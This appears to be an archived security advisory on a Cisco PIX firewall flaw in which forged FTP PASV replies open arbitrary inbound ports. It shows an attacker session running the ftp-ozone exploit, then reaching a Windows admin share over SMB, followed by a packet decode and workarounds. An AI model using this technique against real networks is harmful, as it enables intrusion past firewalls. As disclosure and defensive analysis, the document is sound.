COMMAND

    PIX

SYSTEMS AFFECTED

    Cisco

PROBLEM

    Eric Monti confirmed and did some more research regarding the  PIX
    hole  mentioned  by  Jacek  Lipkowski  on  bugtraq entitled.  It's
    available at:

        http://oliver.efri.hr/~crv/security/bugs/Others/fw-13.html

    Eric was  able to  verify that  PIX is  vulnerable to the FTP-Pasv
    vulnerability that has been discussed on the Bugtraq mailing  list
    as of late.  Here are his notes and findings.

    In a  nutshell the  PIX can  be fooled  into opening  up ports for
    inbound connections to a DMZ FTP  server if the FTP server can  be
    fooled  into   sending  back   what  looks   like  a   valid  "227
    (xxx,xxx,xxx,xx,prt,prt) response. The problem on the PIX is  that
    the 'fixup  protocol ftp'  component does  not provide  sufficient
    enough  checks  to  verify  PASV  connections  before  creating  a
    dynamic hole through  the firewall.   Note that there  are several
    ways  to  get  the  FTP  server  to generate the message that will
    trigger PIX's insecure behaviour.  The exploit used for testing
    was Dug Song's ftp-ozone.c (available at link above).

    The PIX tested  is running the  4.4(4) version of  software. Other
    versions have not been tested but are most likelly vulnerable.

    Here is the session from  the attacker. "ftp-ozone" is the  public
    exploit  from  Dug  Song.   Eric  made  a  few  minor   'asthetic'
    adjustments  and  added  support  for  anonymous  login  with '-l'
    (although it  wasnt used  in this  example).   The source  code is
    below.

        --------------Exploit Launched-----------------
        [root@ix ftp-atk]# ./ftp-ozone 10.1.2.3 139
        220 victim Microsoft FTP Service (Version 4.0).
        
        Garbage packet contains:
        500 '...........................................................................................................................
        
        Money packet contains:
        227 (10,1,2,3,0,139)': command not understood
        
        
        -------------Opened port connected (NBT)-------
        [root@ix ftp-atk]# smbclient \\\\VICTIM\\c$ -I 10.1.2.3 -U administrator
        Added interface ip=127.0.0.1 bcast=127.255.255.255 nmask=255.0.0.0
        Password: ********
        Domain=[VICTIM] OS=[Windows NT 4.0] Server=[NT LAN Manager 4.0]
        smb: \> dir
          AUTOEXEC.BAT                        A       0  Mon Mar 13 03:22:58 2000
          boot.ini                          ASR     279  Mon Mar 13 03:15:07 2000
          CONFIG.SYS                          A       0  Mon Mar 13 03:22:58 2000
          IO.SYS                           AHSR       0  Mon Mar 13 03:22:58 2000
          MSDOS.SYS                        AHSR       0  Mon Mar 13 03:22:58 2000
          MSSCE                               D       0  Tue Mar  7 14:29:57 2000
          NTDETECT.COM                     AHSR   26816  Tue Mar  7 11:47:49 2000
          ntldr                            AHSR  156496  Tue Mar  7 11:47:49 2000
          pagefile.sys                        A1073741824  Tue Mar  7 11:51:51 2000
          Program Files                       D       0  Tue Mar  7 11:35:11 2000
          RECYCLER                          DHS       0  Mon Mar 13 09:35:51 2000
          TEMP                               DA       0  Tue Mar  7 14:36:31 2000
          WINNT                               D       0  Tue Mar  7 14:30:05 2000
        
                        64706 blocks of size 65536. 43841 blocks available
        smb: \> quit

    As you can see above; after the manipulated packet generated  from
    the FTP server  by ftp-ozone is  returned, we are  able to connect
    to the NBT(tcp/139) service and access  a share.  On the PIX  with
    'logging  console  debug'  set,  this  was  all  that  showed  up:
    302001:  Built inbound TCP connection 202 for faddr  10.1.2.4/1139
    gaddr 10.1.2.3/21 laddr 192.168.205.2/21

    Below is a packet decode generated from tcpdump -w.  The IP's used
    are   as    follows:    attacker=10.1.2.4,    victim-nat=10.1.2.3,
    victim-real=192.168.205.2(doesnt appear in decode)

    The PIX sits between 10.1.2.4 and 192.168.2.2 (obviously).

    In Packet #11 of the decode, in the TCP data segment, you can  see
    what   is   triggering   the   PIX's   insecure   behavior:   "227
    (10,1,2,3,0,139)': command not understood."

    This confirms what was assumed;  that the only check that  the PIX
    makes before creating a dynamic  PASV conduit is whether the  "227
    (xxx,xxx,xxx,xxx,prt,prt)" appears at the beginning of the packet.

    Here's the decode package:

        Packet 1
	        Timestamp:			15:02:37.130283
	        Source Ethernet Address:	00:50:04:28:FE:EB
	        Destination Ethernet Address:	00:D0:B7:0E:18:AB
	        Encapsulated Protocol:		IP
        IP Header
	        Version:			4
	        Header Length:			20 bytes
	        Service Type:			0x00
	        Datagram Length:		60 bytes
	        Identification:			0x04CF
	        Flags:				MF=off, DF=on
	        Fragment Offset:		0
	        TTL:				64
	        Encapsulated Protocol:		TCP
	        Header Checksum:		0x1D4C
	        Source IP Address:		10.1.2.4
	        Destination IP Address:		10.1.2.3
        TCP Header
	        Source Port:			1139 (<unknown>)
	        Destination Port:		21 (ftp)
	        Sequence Number:		1818403974
	        Acknowledgement Number:		0000000000
	        Header Length:			40 bytes (data=0)
	        Flags:				URG=off, ACK=off, PSH=off
					        RST=off, SYN=on,  FIN=off
	        Window Advertisement:		128 bytes
	        Checksum:			0x78CB
	        Urgent Pointer:			0
	        <Options not displayed>
        TCP Data
	        <No data>
        -----------------------------------------------------------------
        Packet 2
	        Timestamp:			15:02:37.130720
	        Source Ethernet Address:	00:D0:B7:0E:18:AB
	        Destination Ethernet Address:	00:50:04:28:FE:EB
	        Encapsulated Protocol:		IP
        IP Header
	        Version:			4
	        Header Length:			20 bytes
	        Service Type:			0x00
	        Datagram Length:		44 bytes
	        Identification:			0x4311
	        Flags:				MF=off, DF=on
	        Fragment Offset:		0
	        TTL:				128
	        Encapsulated Protocol:		TCP
	        Header Checksum:		0x9F19
	        Source IP Address:		10.1.2.3
	        Destination IP Address:		10.1.2.4
        TCP Header
	        Source Port:			21 (ftp)
	        Destination Port:		1139 (<unknown>)
	        Sequence Number:		1212576390
	        Acknowledgement Number:		1818403975
	        Header Length:			24 bytes (data=0)
	        Flags:				URG=off, ACK=on,  PSH=off
					        RST=off, SYN=on,  FIN=off
	        Window Advertisement:		8760 bytes
	        Checksum:			0x8CFE
	        Urgent Pointer:			0
	        <Options not displayed>
        TCP Data
	        <No data>
        -----------------------------------------------------------------
        Packet 3
	        Timestamp:			15:02:37.130765
	        Source Ethernet Address:	00:50:04:28:FE:EB
	        Destination Ethernet Address:	00:D0:B7:0E:18:AB
	        Encapsulated Protocol:		IP
        IP Header
	        Version:			4
	        Header Length:			20 bytes
	        Service Type:			0x00
	        Datagram Length:		40 bytes
	        Identification:			0x04D0
	        Flags:				MF=off, DF=on
	        Fragment Offset:		0
	        TTL:				64
	        Encapsulated Protocol:		TCP
	        Header Checksum:		0x1D5F
	        Source IP Address:		10.1.2.4
	        Destination IP Address:		10.1.2.3
        TCP Header
	        Source Port:			1139 (<unknown>)
	        Destination Port:		21 (ftp)
	        Sequence Number:		1818403975
	        Acknowledgement Number:		1212576391
	        Header Length:			20 bytes (data=0)
	        Flags:				URG=off, ACK=on,  PSH=off
					        RST=off, SYN=off, FIN=off
	        Window Advertisement:		128 bytes
	        Checksum:			0xC673
	        Urgent Pointer:			0
        TCP Data
	        <No data>
        -----------------------------------------------------------------
        Packet 4
	        Timestamp:			15:02:37.131178
	        Source Ethernet Address:	00:D0:B7:0E:18:AB
	        Destination Ethernet Address:	00:50:04:28:FE:EB
	        Encapsulated Protocol:		IP
        IP Header
	        Version:			4
	        Header Length:			20 bytes
	        Service Type:			0x00
	        Datagram Length:		88 bytes
	        Identification:			0x4411
	        Flags:				MF=off, DF=on
	        Fragment Offset:		0
	        TTL:				128
	        Encapsulated Protocol:		TCP
	        Header Checksum:		0x9DED
	        Source IP Address:		10.1.2.3
	        Destination IP Address:		10.1.2.4
        TCP Header
	        Source Port:			21 (ftp)
	        Destination Port:		1139 (<unknown>)
	        Sequence Number:		1212576391
	        Acknowledgement Number:		1818403975
	        Header Length:			20 bytes (data=48)
	        Flags:				URG=off, ACK=on,  PSH=on
					        RST=off, SYN=off, FIN=off
	        Window Advertisement:		8760 bytes
	        Checksum:			0x0458
	        Urgent Pointer:			0
        TCP Data
	        220 wapp2 Microsoft FTP Service (Version 4.0)..
        
        -----------------------------------------------------------------
        Packet 5
	        Timestamp:			15:02:37.131204
	        Source Ethernet Address:	00:50:04:28:FE:EB
	        Destination Ethernet Address:	00:D0:B7:0E:18:AB
	        Encapsulated Protocol:		IP
        IP Header
	        Version:			4
	        Header Length:			20 bytes
	        Service Type:			0x00
	        Datagram Length:		40 bytes
	        Identification:			0x04D1
	        Flags:				MF=off, DF=on
	        Fragment Offset:		0
	        TTL:				64
	        Encapsulated Protocol:		TCP
	        Header Checksum:		0x1D5E
	        Source IP Address:		10.1.2.4
	        Destination IP Address:		10.1.2.3
        TCP Header
	        Source Port:			1139 (<unknown>)
	        Destination Port:		21 (ftp)
	        Sequence Number:		1818403975
	        Acknowledgement Number:		1212576439
	        Header Length:			20 bytes (data=0)
	        Flags:				URG=off, ACK=on,  PSH=off
					        RST=off, SYN=off, FIN=off
	        Window Advertisement:		80 bytes
	        Checksum:			0xC673
	        Urgent Pointer:			0
        TCP Data
	        <No data>
        -----------------------------------------------------------------
        Packet 6
	        Timestamp:			15:02:47.126818
	        Source Ethernet Address:	00:50:04:28:FE:EB
	        Destination Ethernet Address:	00:D0:B7:0E:18:AB
	        Encapsulated Protocol:		IP
        IP Header
	        Version:			4
	        Header Length:			20 bytes
	        Service Type:			0x00
	        Datagram Length:		163 bytes
	        Identification:			0x04D2
	        Flags:				MF=off, DF=on
	        Fragment Offset:		0
	        TTL:				64
	        Encapsulated Protocol:		TCP
	        Header Checksum:		0x1CE2
	        Source IP Address:		10.1.2.4
	        Destination IP Address:		10.1.2.3
        TCP Header
	        Source Port:			1139 (<unknown>)
	        Destination Port:		21 (ftp)
	        Sequence Number:		1818403975
	        Acknowledgement Number:		1212576439
	        Header Length:			20 bytes (data=123)
	        Flags:				URG=off, ACK=on,  PSH=on
					        RST=off, SYN=off, FIN=off
	        Window Advertisement:		128 bytes
	        Checksum:			0x96BF
	        Urgent Pointer:			0
        TCP Data
	        ...........................................................................................................................
        -----------------------------------------------------------------
        Packet 7
	        Timestamp:			15:02:47.248131
	        Source Ethernet Address:	00:D0:B7:0E:18:AB
	        Destination Ethernet Address:	00:50:04:28:FE:EB
	        Encapsulated Protocol:		IP
        IP Header
	        Version:			4
	        Header Length:			20 bytes
	        Service Type:			0x00
	        Datagram Length:		40 bytes
	        Identification:			0x4511
	        Flags:				MF=off, DF=on
	        Fragment Offset:		0
	        TTL:				128
	        Encapsulated Protocol:		TCP
	        Header Checksum:		0x9D1D
	        Source IP Address:		10.1.2.3
	        Destination IP Address:		10.1.2.4
        TCP Header
	        Source Port:			21 (ftp)
	        Destination Port:		1139 (<unknown>)
	        Sequence Number:		1212576439
	        Acknowledgement Number:		1818404098
	        Header Length:			20 bytes (data=0)
	        Flags:				URG=off, ACK=on,  PSH=off
					        RST=off, SYN=off, FIN=off
	        Window Advertisement:		8637 bytes
	        Checksum:			0xA48B
	        Urgent Pointer:			0
        TCP Data
	        <No data>
        -----------------------------------------------------------------
        Packet 8
	        Timestamp:			15:02:47.248184
	        Source Ethernet Address:	00:50:04:28:FE:EB
	        Destination Ethernet Address:	00:D0:B7:0E:18:AB
	        Encapsulated Protocol:		IP
        IP Header
	        Version:			4
	        Header Length:			20 bytes
	        Service Type:			0x00
	        Datagram Length:		69 bytes
	        Identification:			0x04D3
	        Flags:				MF=off, DF=on
	        Fragment Offset:		0
	        TTL:				64
	        Encapsulated Protocol:		TCP
	        Header Checksum:		0x1D3F
	        Source IP Address:		10.1.2.4
	        Destination IP Address:		10.1.2.3
        TCP Header
	        Source Port:			1139 (<unknown>)
	        Destination Port:		21 (ftp)
	        Sequence Number:		1818404098
	        Acknowledgement Number:		1212576439
	        Header Length:			20 bytes (data=29)
	        Flags:				URG=off, ACK=on,  PSH=on
					        RST=off, SYN=off, FIN=off
	        Window Advertisement:		128 bytes
	        Checksum:			0x2602
	        Urgent Pointer:			0
        TCP Data
	        227 (10,1,2,3,0,139).
        
        -----------------------------------------------------------------
        Packet 9
	        Timestamp:			15:02:47.248558
	        Source Ethernet Address:	00:D0:B7:0E:18:AB
	        Destination Ethernet Address:	00:50:04:28:FE:EB
	        Encapsulated Protocol:		IP
        IP Header
	        Version:			4
	        Header Length:			20 bytes
	        Service Type:			0x00
	        Datagram Length:		168 bytes
	        Identification:			0x4611
	        Flags:				MF=off, DF=on
	        Fragment Offset:		0
	        TTL:				128
	        Encapsulated Protocol:		TCP
	        Header Checksum:		0x9B9D
	        Source IP Address:		10.1.2.3
	        Destination IP Address:		10.1.2.4
        TCP Header
	        Source Port:			21 (ftp)
	        Destination Port:		1139 (<unknown>)
	        Sequence Number:		1212576439
	        Acknowledgement Number:		1818404127
	        Header Length:			20 bytes (data=128)
	        Flags:				URG=off, ACK=on,  PSH=off
					        RST=off, SYN=off, FIN=off
	        Window Advertisement:		8608 bytes
	        Checksum:			0x168C
	        Urgent Pointer:			0
        TCP Data
	        500 '...........................................................................................................................
        -----------------------------------------------------------------
        Packet 10
	        Timestamp:			15:02:47.248599
	        Source Ethernet Address:	00:50:04:28:FE:EB
	        Destination Ethernet Address:	00:D0:B7:0E:18:AB
	        Encapsulated Protocol:		IP
        IP Header
	        Version:			4
	        Header Length:			20 bytes
	        Service Type:			0x00
	        Datagram Length:		40 bytes
	        Identification:			0x04D4
	        Flags:				MF=off, DF=on
	        Fragment Offset:		0
	        TTL:				64
	        Encapsulated Protocol:		TCP
	        Header Checksum:		0x1D5B
	        Source IP Address:		10.1.2.4
	        Destination IP Address:		10.1.2.3
        TCP Header
	        Source Port:			1139 (<unknown>)
	        Destination Port:		21 (ftp)
	        Sequence Number:		1818404127
	        Acknowledgement Number:		1212576567
	        Header Length:			20 bytes (data=0)
	        Flags:				URG=off, ACK=on,  PSH=off
					        RST=off, SYN=off, FIN=off
	        Window Advertisement:		128 bytes
	        Checksum:			0xC52B
	        Urgent Pointer:			0
        TCP Data
	        <No data>
        -----------------------------------------------------------------
        Packet 11
	        Timestamp:			15:02:47.248836
	        Source Ethernet Address:	00:D0:B7:0E:18:AB
	        Destination Ethernet Address:	00:50:04:28:FE:EB
	        Encapsulated Protocol:		IP
        IP Header
	        Version:			4
	        Header Length:			20 bytes
	        Service Type:			0x00
	        Datagram Length:		94 bytes
	        Identification:			0x4711
	        Flags:				MF=off, DF=on
	        Fragment Offset:		0
	        TTL:				128
	        Encapsulated Protocol:		TCP
	        Header Checksum:		0x9AE7
	        Source IP Address:		10.1.2.3
	        Destination IP Address:		10.1.2.4
        TCP Header
	        Source Port:			21 (ftp)
	        Destination Port:		1139 (<unknown>)
	        Sequence Number:		1212576567
	        Acknowledgement Number:		1818404127
	        Header Length:			20 bytes (data=54)
	        Flags:				URG=off, ACK=on,  PSH=on
					        RST=off, SYN=off, FIN=off
	        Window Advertisement:		8608 bytes
	        Checksum:			0x1DD1
	        Urgent Pointer:			0
        TCP Data
	        227 (10,1,2,3,0,139)': command not understood.
        
        -----------------------------------------------------------------
        Packet 12
	        Timestamp:			15:02:47.266742
	        Source Ethernet Address:	00:50:04:28:FE:EB
	        Destination Ethernet Address:	00:D0:B7:0E:18:AB
	        Encapsulated Protocol:		IP
        IP Header
	        Version:			4
	        Header Length:			20 bytes
	        Service Type:			0x00
	        Datagram Length:		40 bytes
	        Identification:			0x04D5
	        Flags:				MF=off, DF=on
	        Fragment Offset:		0
	        TTL:				64
	        Encapsulated Protocol:		TCP
	        Header Checksum:		0x1D5A
	        Source IP Address:		10.1.2.4
	        Destination IP Address:		10.1.2.3
        TCP Header
	        Source Port:			1139 (<unknown>)
	        Destination Port:		21 (ftp)
	        Sequence Number:		1818404127
	        Acknowledgement Number:		1212576621
	        Header Length:			20 bytes (data=0)
	        Flags:				URG=off, ACK=on,  PSH=off
					        RST=off, SYN=off, FIN=off
	        Window Advertisement:		128 bytes
	        Checksum:			0xC4F5
	        Urgent Pointer:			0
        TCP Data
	        <No data>

SOLUTION

    Essentially  this  is  the  same  as  the  more  widely publicized
    Firewall-1 incarnation  of the  hole (without  their patch),  only
    there are a few major differences to note:

        1. The   port  opened   will  allow   bi-directional   traffic
           (confirmed in PIX 4.4(4), probably others as well).
        2. *ANY* port can be opened, even low-numbered and  well-known
           ports.   This could  be worked  around with  a conduit  ACL
           using explicit denies on the external interface.
        3. The 'fixup protocol ftp' is what appears to be the core  of
           this problem on the PIX side  of it. If it is disabled  the
           exploit  (in  any  version)  will  not  work.  This is what
           handles PASV  FTP on  the PIX.   If you  disable it though,
           there are two things to note:
           - Outbound ftp connections  from the inside *have*  be made
             with PASV ftp clients.
           - Inbound ftp connections from the outside world cannot use
             PASV.

    There may be other workarounds than those cited above.